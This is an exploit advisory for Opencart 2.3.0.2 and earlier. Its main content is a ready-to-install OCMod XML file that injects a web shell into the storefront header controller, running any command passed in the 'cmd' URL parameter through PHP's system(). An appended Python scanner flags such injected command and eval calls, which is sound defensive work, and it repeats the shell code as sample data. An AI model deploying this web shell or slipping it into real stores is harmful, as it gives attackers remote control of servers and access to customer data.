Opencart 2.3.0.2 Insecure OCMod Generation Remote Command Execution

Opencart versions 2.3.0.2 and below suffer from an insecure OCMod generation remote command execution vulnerability.


MD5 | 6fe443a1799c4db7980052fb9c608ef3

<?xml version="1.0" encoding="utf-8"?>

<!-- Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE -->

<!-- Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> -->

<!-- Disclaimer: -->

<!-- This or previous programs is for Educational -->
<!-- purpose ONLY. Do not use it without permission. -->
<!-- The usual disclaimer applies, especially the -->
<!-- fact that Todor Donev is not liable for any -->
<!-- damages caused by direct or indirect use of the -->
<!-- information or functionality provided by these -->
<!-- programs. The author or any Internet provider -->
<!-- bears NO responsibility for content or misuse -->
<!-- of these programs or any derivatives thereof. -->
<!-- By using these programs you accept the fact -->
<!-- that any damage (dataloss, system crash, -->
<!-- system compromise, etc.) caused by the use -->
<!-- of these programs is not Todor Donev's -->
<!-- responsibility. -->

<!-- Use them at your own risk! -->

<!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml -->

<modification>
<name><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></name>
<code><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></code>
<version>1.0</version>
<author>Todor Donev</author>
<link>mailto:todor.donev@gmail.com</link>

<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){
echo "<pre>";
$cmd = ($this->request->get['cmd']);
system($cmd);
echo "</pre>";
}]]></add>
</operation>
</file>
</modification>
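
A defender-side check for the pattern in the file above, added here as an example that is not part of the original advisory or the author's code: it parses an OCMod file before installation and flags `<add>` blocks that inject command-execution or code-evaluation calls. The function name `scan_ocmod`, the list of flagged PHP functions, and the sample XML are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET  # for untrusted uploads, defusedxml is the safer parser

# Constructed sample mirroring the structure of the modification file above.
SAMPLE_OCMOD = """<?xml version="1.0" encoding="utf-8"?>
<modification>
<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){
$cmd = ($this->request->get['cmd']);
system($cmd);
}]]></add>
</operation>
</file>
<file path="catalog/view/theme/default/template/common/footer.tpl">
<operation>
<search><![CDATA[</footer>]]></search>
<add position="before"><![CDATA[<p>Seasonal banner</p>]]></add>
</operation>
</file>
</modification>"""

# PHP calls that run OS commands or evaluate code (assumed, non-exhaustive list).
DANGEROUS_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
# Request data read directly inside the injected code.
REQUEST_INPUT = re.compile(
    r"\$_(GET|POST|REQUEST|COOKIE)\b|\$this->request->(get|post|cookie)\b", re.I)

def scan_ocmod(xml_text):
    """Return one finding per <add> block that injects risky PHP."""
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for file_node in root.iter("file"):
        for op in file_node.iter("operation"):
            add = op.find("add")
            code = (add.text or "") if add is not None else ""
            calls = sorted({m.group(1).lower() for m in DANGEROUS_CALL.finditer(code)})
            if calls:
                findings.append({"path": file_node.get("path"), "calls": calls,
                                 "uses_request_input": bool(REQUEST_INPUT.search(code))})
    return findings

if __name__ == "__main__":
    for finding in scan_ocmod(SAMPLE_OCMOD):
        print(finding)
```

A finding with `uses_request_input` set means the injected code both reads request parameters and reaches a command or eval call, which is the shape of the modification shown above.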
